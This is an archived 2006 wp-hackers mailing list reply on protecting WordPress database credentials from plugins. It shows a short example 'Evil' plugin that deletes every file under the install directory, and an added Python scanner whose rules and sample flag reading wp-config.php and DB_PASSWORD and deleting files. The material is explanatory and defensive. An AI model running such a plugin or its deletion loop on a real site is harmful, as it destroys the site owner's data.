[wp-hackers] Keeping database connection info safe

Rob r at robm.me.uk
Sat Feb 25 02:52:22 GMT 2006


Joseph Scott wrote:
>
> You are absolutely correct.  I must admit that I hadn't thought about 
> re-including the wp-config.php file.  Well that bites.  Is there any 
> way to really protect against this in either PHP4 or PHP5?  I'm 
> inclined at this point to say no and that everyone better be scanning 
> their plugins for "evil".  Has anyone put together a list of things 
> that should raise the red flag when they see it in a plugin?
>
>
> -- 
> Joseph Scott
> joseph at randomnetworks.com
> http://joseph.randomnetworks.com/

But then what's to stop the inevitable

<?php
/*
Plugin Name: Evil
*/

foreach(glob(ABSPATH.'/*') as $file) {
    unlink($file);
}

?>

?

There's no way of stopping malicious code from running other than 
reviewing it before you run.

-- 
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/
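
As a starting point for the red-flag list asked about above and the pre-run review the reply recommends, here is an added example (not code from either poster or from WordPress) that scans plugin source as text without executing it. The rule names and the `strip_comments`/`scan_plugin` helpers are hypothetical, the rule set is an assumption covering only the behaviours raised in this thread, and the sample plugin text is constructed.

```python
import re

# Assumed rule set: only the behaviours raised in this thread (re-reading
# wp-config.php / its DB_* constants, and deleting files found under ABSPATH).
RULES = [
    ("reincludes-wp-config",
     re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*wp-config\.php", re.I)),
    ("reads-db-constant", re.compile(r"\bDB_(?:NAME|USER|PASSWORD|HOST)\b")),
    ("deletes-files", re.compile(r"\b(?:unlink|rmdir)\s*\(", re.I)),
    ("enumerates-abspath",
     re.compile(r"\b(?:glob|scandir|opendir)\s*\([^)]*\bABSPATH\b", re.I)),
]

# String literals are matched first and kept; comments are blanked. Without
# this, the '/*' inside glob(ABSPATH.'/*') would be read as a comment opener.
_TOKEN = re.compile(
    r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|/\*.*?\*/|(?://|#).*?$""",
    re.S | re.M,
)

def strip_comments(source):
    """Replace PHP comments with spaces, preserving line numbers."""
    def blank(match):
        text = match.group(0)
        return text if text[0] in "'\"" else re.sub(r"[^\n]", " ", text)
    return _TOKEN.sub(blank, source)

def scan_plugin(source):
    """Return (line_number, rule_id) for every rule hit in the source text."""
    findings = []
    for lineno, line in enumerate(strip_comments(source).splitlines(), 1):
        findings.extend((lineno, rule) for rule, rx in RULES if rx.search(line))
    return findings

# Constructed sample input, never executed: it is only read as text.
SAMPLE = """<?php
/* Plugin Name: Sample (constructed); unlink() appears only in this comment */
$docs = 'http://example.com/readme'; // require('wp-config.php') in a comment
require_once(ABSPATH . 'wp-config.php');
$secret = DB_PASSWORD;
foreach (glob(ABSPATH . '/*') as $file) {
    unlink($file);
}
"""

if __name__ == "__main__":
    for lineno, rule in scan_plugin(SAMPLE):
        print(f"line {lineno}: {rule}")
```

A hit is a prompt to read that line, not a verdict, and an empty result does not show that a plugin is safe.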


